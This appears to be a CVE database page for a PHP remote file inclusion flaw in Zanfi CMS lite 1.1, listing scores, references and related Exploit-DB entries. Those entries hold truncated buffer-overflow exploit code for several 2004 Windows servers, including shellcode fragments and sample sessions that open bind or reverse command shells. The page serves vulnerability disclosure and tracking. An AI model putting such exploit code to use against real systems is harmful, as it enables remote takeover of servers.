CVE-2004-2195
published 2004-12-31CVE-2004-2195: PHP remote file inclusion vulnerability in index.php in Zanfi CMS lite 1.1 allows remote attackers to execute arbitrary PHP code via the inc parameter.
PriorityP426medium5CVSS 2.0
AVNACLAuNCNIPAN
EPSS
1.73%
74.7th percentile
PHP remote file inclusion vulnerability in index.php in Zanfi CMS lite 1.1 allows remote attackers to execute arbitrary PHP code via the inc parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zanfi_solutions | zanfi_cms_lite | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb·2004-11-29
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb·2004-11-16
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (2)
MiniShare 1.4.1 - Remote Buffer Overflow (2)
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb·2004-11-16
CVE-2004-1638 TABS MailCarrier 2.51 - Remote Buffer Overflow
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-11-07
CVE-2004-1626 Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb·2004-10-26
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
No writeups or analysis indexed.
http://secunia.com/advisories/12792http://securitytracker.com/id?1011612http://www.osvdb.org/10676http://www.securityfocus.com/archive/1/378053http://www.securityfocus.com/bid/11362https://exchange.xforce.ibmcloud.com/vulnerabilities/17691http://secunia.com/advisories/12792http://securitytracker.com/id?1011612http://www.osvdb.org/10676http://www.securityfocus.com/archive/1/378053http://www.securityfocus.com/bid/11362https://exchange.xforce.ibmcloud.com/vulnerabilities/17691
2004-12-31
Published